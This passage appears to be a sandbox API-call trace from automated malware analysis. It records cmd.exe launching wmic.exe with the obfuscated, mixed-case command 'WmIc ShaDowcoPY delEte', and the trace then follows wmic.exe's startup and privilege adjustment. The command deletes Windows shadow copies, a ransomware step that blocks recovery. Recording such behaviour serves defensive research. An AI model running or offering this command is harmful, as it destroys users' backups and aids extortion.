_String2="DATE") returned 19 [0082.636] _wcsicmp (_String1="WmIc", _String2="TIME") returned 3 [0082.636] _wcsicmp (_String1="WmIc", _String2="PROMPT") returned 7 [0082.636] _wcsicmp (_String1="WmIc", _String2="MD") returned 10 [0082.636] _wcsicmp (_String1="WmIc", _String2="MKDIR") returned 10 [0082.636] _wcsicmp (_String1="WmIc", _String2="RD") returned 5 [0082.636] _wcsicmp (_String1="WmIc", _String2="RMDIR") returned 5 [0082.636] _wcsicmp (_String1="WmIc", _String2="PATH") returned 7 [0082.636] _wcsicmp (_String1="WmIc", _String2="GOTO") returned 16 [0082.636] _wcsicmp (_String1="WmIc", _String2="SHIFT") returned 4 [0082.636] _wcsicmp (_String1="WmIc", _String2="CLS") returned 20 [0082.636] _wcsicmp (_String1="WmIc", _String2="CALL") returned 20 [0082.636] _wcsicmp (_String1="WmIc", _String2="VERIFY") returned 1 [0082.636] _wcsicmp (_String1="WmIc", _String2="VER") returned 1 [0082.637] _wcsicmp (_String1="WmIc", _String2="VOL") returned 1 [0082.637] _wcsicmp (_String1="WmIc", _String2="EXIT") returned 18 [0082.637] _wcsicmp (_String1="WmIc", _String2="SETLOCAL") returned 4 [0082.637] _wcsicmp (_String1="WmIc", _String2="ENDLOCAL") returned 18 [0082.637] _wcsicmp (_String1="WmIc", _String2="TITLE") returned 3 [0082.637] _wcsicmp (_String1="WmIc", _String2="START") returned 4 [0082.637] _wcsicmp (_String1="WmIc", _String2="DPATH") returned 19 [0082.637] _wcsicmp (_String1="WmIc", _String2="KEYS") returned 12 [0082.637] _wcsicmp (_String1="WmIc", _String2="MOVE") returned 10 [0082.637] _wcsicmp (_String1="WmIc", _String2="PUSHD") returned 7 [0082.637] _wcsicmp (_String1="WmIc", _String2="POPD") returned 7 [0082.637] _wcsicmp (_String1="WmIc", _String2="ASSOC") returned 22 [0082.637] _wcsicmp (_String1="WmIc", _String2="FTYPE") returned 17 [0082.637] _wcsicmp (_String1="WmIc", _String2="BREAK") returned 21 [0082.637] _wcsicmp (_String1="WmIc", _String2="COLOR") returned 20 [0082.637] _wcsicmp (_String1="WmIc", _String2="MKLINK") returned 10 [0082.637] _wcsicmp (_String1="WmIc", _String2="DIR") returned 19 [0082.637] _wcsicmp (_String1="WmIc", _String2="ERASE") returned 18 [0082.637] _wcsicmp (_String1="WmIc", _String2="DEL") returned 19 [0082.637] _wcsicmp (_String1="WmIc", _String2="TYPE") returned 3 [0082.637] _wcsicmp (_String1="WmIc", _String2="COPY") returned 20 [0082.637] _wcsicmp (_String1="WmIc", _String2="CD") returned 20 [0082.637] _wcsicmp (_String1="WmIc", _String2="CHDIR") returned 20 [0082.637] _wcsicmp (_String1="WmIc", _String2="RENAME") returned 5 [0082.637] _wcsicmp (_String1="WmIc", _String2="REN") returned 5 [0082.637] _wcsicmp (_String1="WmIc", _String2="ECHO") returned 18 [0082.638] _wcsicmp (_String1="WmIc", _String2="SET") returned 4 [0082.638] _wcsicmp (_String1="WmIc", _String2="PAUSE") returned 7 [0082.638] _wcsicmp (_String1="WmIc", _String2="DATE") returned 19 [0082.638] _wcsicmp (_String1="WmIc", _String2="TIME") returned 3 [0082.638] _wcsicmp (_String1="WmIc", _String2="PROMPT") returned 7 [0082.638] _wcsicmp (_String1="WmIc", _String2="MD") returned 10 [0082.638] _wcsicmp (_String1="WmIc", _String2="MKDIR") returned 10 [0082.638] _wcsicmp (_String1="WmIc", _String2="RD") returned 5 [0082.638] _wcsicmp (_String1="WmIc", _String2="RMDIR") returned 5 [0082.638] _wcsicmp (_String1="WmIc", _String2="PATH") returned 7 [0082.638] _wcsicmp (_String1="WmIc", _String2="GOTO") returned 16 [0082.638] _wcsicmp (_String1="WmIc", _String2="SHIFT") returned 4 [0082.638] _wcsicmp (_String1="WmIc", _String2="CLS") returned 20 [0082.638] _wcsicmp (_String1="WmIc", _String2="CALL") returned 20 [0082.638] _wcsicmp (_String1="WmIc", _String2="VERIFY") returned 1 [0082.638] _wcsicmp (_String1="WmIc", _String2="VER") returned 1 [0082.638] _wcsicmp (_String1="WmIc", _String2="VOL") returned 1 [0082.638] _wcsicmp (_String1="WmIc", _String2="EXIT") returned 18 [0082.638] _wcsicmp (_String1="WmIc", _String2="SETLOCAL") returned 4 [0082.638] _wcsicmp (_String1="WmIc", _String2="ENDLOCAL") returned 18 [0082.638] _wcsicmp (_String1="WmIc", _String2="TITLE") returned 3 [0082.638] _wcsicmp (_String1="WmIc", _String2="START") returned 4 [0082.638] _wcsicmp (_String1="WmIc", _String2="DPATH") returned 19 [0082.638] _wcsicmp (_String1="WmIc", _String2="KEYS") returned 12 [0082.638] _wcsicmp (_String1="WmIc", _String2="MOVE") returned 10 [0082.638] _wcsicmp (_String1="WmIc", _String2="PUSHD") returned 7 [0082.638] _wcsicmp (_String1="WmIc", _String2="POPD") returned 7 [0082.638] _wcsicmp (_String1="WmIc", _String2="ASSOC") returned 22 [0082.639] _wcsicmp (_String1="WmIc", _String2="FTYPE") returned 17 [0082.639] _wcsicmp (_String1="WmIc", _String2="BREAK") returned 21 [0082.639] _wcsicmp (_String1="WmIc", _String2="COLOR") returned 20 [0082.639] _wcsicmp (_String1="WmIc", _String2="MKLINK") returned 10 [0082.639] _wcsicmp (_String1="WmIc", _String2="FOR") returned 17 [0082.639] _wcsicmp (_String1="WmIc", _String2="IF") returned 14 [0082.639] _wcsicmp (_String1="WmIc", _String2="REM") returned 5 [0082.639] GetProcessHeap () returned 0x3b0000 [0082.639] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x210) returned 0x3c3098 [0082.639] GetProcessHeap () returned 0x3b0000 [0082.639] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38) returned 0x3c32b0 [0082.639] _wcsnicmp (_String1="WmIc", _String2="cmd ", _MaxCount=0x4) returned 20 [0082.639] GetProcessHeap () returned 0x3b0000 [0082.640] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x418) returned 0x3b07f0 [0082.640] SetErrorMode (uMode=0x0) returned 0x0 [0082.640] SetErrorMode (uMode=0x1) returned 0x0 [0082.640] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b07f8, lpFilePart=0x34f1c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f1c8*="Desktop") returned 0x25 [0082.640] SetErrorMode (uMode=0x0) returned 0x1 [0082.640] GetProcessHeap () returned 0x3b0000 [0082.640] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b07f0, Size=0x5e) returned 0x3b07f0 [0082.640] GetProcessHeap () returned 0x3b0000 [0082.640] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b07f0) returned 0x5e [0082.640] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aaa0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0082.640] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0082.640] GetProcessHeap () returned 0x3b0000 [0082.640] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x120) returned 0x3c32f0 [0082.640] GetProcessHeap () returned 0x3b0000 [0082.640] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x238) returned 0x3b0858 [0082.651] GetProcessHeap () returned 0x3b0000 [0082.651] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b0858, Size=0x122) returned 0x3b0858 [0082.651] GetProcessHeap () returned 0x3b0000 [0082.651] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b0858) returned 0x122 [0082.651] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aaa0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0082.651] GetProcessHeap () returned 0x3b0000 [0082.651] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe0) returned 0x3c3418 [0082.652] GetProcessHeap () returned 0x3b0000 [0082.652] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c3418, Size=0x76) returned 0x3c3418 [0082.652] GetProcessHeap () returned 0x3b0000 [0082.652] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c3418) returned 0x76 [0082.704] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0082.704] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmIc.*", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0xffffffff [0082.705] GetLastError () returned 0x2 [0082.705] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WmIc", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0xffffffff [0082.705] GetLastError () returned 0x2 [0082.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0082.705] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WmIc.*", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0xffffffff [0082.705] GetLastError () returned 0x2 [0082.705] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WmIc", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0xffffffff [0082.705] GetLastError () returned 0x2 [0082.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0082.706] FindFirstFileExW (in: lpFileName="C:\\Windows\\WmIc.*", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0xffffffff [0082.706] GetLastError () returned 0x2 [0082.706] FindFirstFileExW (in: lpFileName="C:\\Windows\\WmIc", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0xffffffff [0082.706] GetLastError () returned 0x2 [0082.706] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0082.706] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WmIc.*", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0x3c3498 [0082.707] GetProcessHeap () returned 0x3b0000 [0082.707] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x14) returned 0x3c34d8 [0082.707] FindClose (in: hFindFile=0x3c3498 | out: hFindFile=0x3c3498) returned 1 [0082.708] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0xffffffff [0082.710] GetLastError () returned 0x2 [0082.711] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x34ef44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34ef44) returned 0x3c3498 [0082.712] GetProcessHeap () returned 0x3b0000 [0082.712] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c34d8, Size=0x4) returned 0x3c34d8 [0082.712] FindClose (in: hFindFile=0x3c3498 | out: hFindFile=0x3c3498) returned 1 [0082.713] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0082.713] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0082.713] GetConsoleTitleW (in: lpConsoleTitle=0x34f43c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0082.713] InitializeProcThreadAttributeList (in: lpAttributeList=0x34f2c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34f38c | out: lpAttributeList=0x34f2c4, lpSize=0x34f38c) returned 1 [0082.713] UpdateProcThreadAttribute (in: lpAttributeList=0x34f2c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x34f384, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34f2c4, lpPreviousValue=0x0) returned 1 [0082.713] GetStartupInfoW (in: lpStartupInfo=0x34f280 | out: lpStartupInfo=0x34f280*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0082.713] GetProcessHeap () returned 0x3b0000 [0082.713] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x18) returned 0x3c3498 [0082.713] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0082.713] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0082.713] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0082.713] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0082.713] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0082.713] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0082.714] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0082.715] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0082.715] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0082.715] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0082.715] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0082.715] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0082.715] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0082.715] GetProcessHeap () returned 0x3b0000 [0082.715] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c3498 | out: hHeap=0x3b0000) returned 1 [0082.715] GetProcessHeap () returned 0x3b0000 [0082.715] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa) returned 0x3bff10 [0082.715] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0082.717] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WmIc ShaDowcoPY delEte", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x34f320*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WmIc ShaDowcoPY delEte", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34f36c | out: lpCommandLine="WmIc ShaDowcoPY delEte", lpProcessInformation=0x34f36c*(hProcess=0x78, hThread=0x74, dwProcessId=0x240, dwThreadId=0x79c)) returned 1 [0082.800] CloseHandle (hObject=0x74) returned 1 [0082.800] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0082.800] GetProcessHeap () returned 0x3b0000 [0082.800] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c5f00 | out: hHeap=0x3b0000) returned 1 [0082.800] GetEnvironmentStringsW () returned 0x3c5f00* [0082.800] GetProcessHeap () returned 0x3b0000 [0082.800] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb36) returned 0x3c40c0 [0082.800] FreeEnvironmentStringsW (penv=0x3c5f00) returned 1 [0082.800] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0116.743] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x34f260 | out: lpExitCode=0x34f260*=0x80041014) returned 1 [0116.743] CloseHandle (hObject=0x78) returned 1 [0116.743] _vsnwprintf (in: _Buffer=0x34f3a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x34f26c | out: _Buffer="80041014") returned 8 [0116.744] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0116.744] GetProcessHeap () returned 0x3b0000 [0116.744] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c40c0 | out: hHeap=0x3b0000) returned 1 [0116.744] GetEnvironmentStringsW () returned 0x3c40c0* [0116.744] GetProcessHeap () returned 0x3b0000 [0116.744] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb5c) returned 0x3c95a8 [0116.744] FreeEnvironmentStringsW (penv=0x3c40c0) returned 1 [0116.744] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.744] GetProcessHeap () returned 0x3b0000 [0116.744] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c95a8 | out: hHeap=0x3b0000) returned 1 [0116.744] GetEnvironmentStringsW () returned 0x3c40c0* [0116.744] GetProcessHeap () returned 0x3b0000 [0116.744] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb5c) returned 0x3c95a8 [0116.745] FreeEnvironmentStringsW (penv=0x3c40c0) returned 1 [0116.745] GetProcessHeap () returned 0x3b0000 [0116.745] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3bff10 | out: hHeap=0x3b0000) returned 1 [0116.745] DeleteProcThreadAttributeList (in: lpAttributeList=0x34f2c4 | out: lpAttributeList=0x34f2c4) [0116.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.745] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.745] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa941ac | out: lpMode=0x4aa941ac) returned 1 [0116.745] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.745] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa941b0 | out: lpMode=0x4aa941b0) returned 1 [0116.746] SetConsoleInputExeNameW () returned 0x1 [0116.746] GetConsoleOutputCP () returned 0x1b5 [0116.746] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa94260 | out: lpCPInfo=0x4aa94260) returned 1 [0116.746] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.746] exit (_Code=-2147217388) Process: id = "3" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x6ca9b000" os_pid = "0x240" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x440" cmd_line = "WmIc ShaDowcoPY delEte" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0x79c [0084.466] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fadc | out: lpSystemTimeAsFileTime=0x25fadc*(dwLowDateTime=0xc9ed45d0, dwHighDateTime=0x1d62251)) [0084.466] GetCurrentProcessId () returned 0x240 [0084.466] GetCurrentThreadId () returned 0x79c [0084.466] GetTickCount () returned 0x114a20a [0084.466] QueryPerformanceCounter (in: lpPerformanceCount=0x25fad4 | out: lpPerformanceCount=0x25fad4*=20479132866) returned 1 [0084.468] GetModuleHandleA (lpModuleName=0x0) returned 0x6d0000 [0084.468] __set_app_type (_Type=0x1) [0084.468] __p__fmode () returned 0x770331f4 [0084.468] __p__commode () returned 0x770331fc [0084.468] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x70dc15) returned 0x0 [0084.468] __wgetmainargs (in: _Argc=0x71c5e8, _Argv=0x71c5f0, _Env=0x71c5ec, _DoWildCard=0, _StartInfo=0x71c5fc | out: _Argc=0x71c5e8, _Argv=0x71c5f0, _Env=0x71c5ec) returned 0 [0084.639] ??0CHString@@QAE@XZ () returned 0x71c28c [0084.639] malloc (_Size=0x18) returned 0x5713b8 [0084.651] malloc (_Size=0x38) returned 0x5713d8 [0084.651] malloc (_Size=0x28) returned 0x573dc8 [0084.651] malloc (_Size=0x18) returned 0x573df8 [0084.651] malloc (_Size=0x24) returned 0x573e18 [0084.652] malloc (_Size=0x18) returned 0x573e48 [0084.652] malloc (_Size=0x18) returned 0x573e68 [0084.652] ??0CHString@@QAE@XZ () returned 0x71c594 [0084.652] malloc (_Size=0x18) returned 0x573e88 [0084.652] ?Empty@CHString@@QAEXXZ () returned 0x752e0504 [0084.652] SetConsoleCtrlHandler (HandlerRoutine=0x706b6f, Add=1) returned 1 [0084.652] _onexit (_Func=0x712f1f) returned 0x712f1f [0084.652] _onexit (_Func=0x712f2e) returned 0x712f2e [0084.652] _onexit (_Func=0x712f42) returned 0x712f42 [0084.653] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.653] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0084.667] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0084.679] CoCreateInstance (in: rclsid=0x6d6c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d6b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71c1b0 | out: ppv=0x71c1b0*=0x5f0828) returned 0x0 [0085.316] GetCurrentProcess () returned 0xffffffff [0085.316] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x25f984 | out: TokenHandle=0x25f984*=0x108) returned 1 [0085.316] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25f980 | out: TokenInformation=0x0, ReturnLength=0x25f980) returned 0 [0085.316] malloc (_Size=0x118) returned 0x572788 [0085.316] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x572788, TokenInformationLength=0x118, ReturnLength=0x25f980 | out: TokenInformation=0x572788, ReturnLength=0x25f980) returned 1 [0085.316] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x572788*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0085.316] free (_Block=0x572788) [0085.316] CloseHandle (hObject=0x108) returned 1 [0085.316] malloc (_Size=0x40) returned 0x572788 [0085.316] malloc (_Size=0x40) returned 0x5727d0 [0085.316] malloc (_Size=0x40) returned 0x572818 [0085.316] malloc (_Size=0x20a) returned 0x572860 [0085.316] GetSystemDirectoryW (in: lpBuffer=0x572860, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0085.316] free (_Block=0x572860) [0085.317] malloc (_Size=0xc) returned 0x573fb8 [0085.317] malloc (_Size=0xc) returned 0x573fd0 [0085.317] malloc (_Size=0xc) 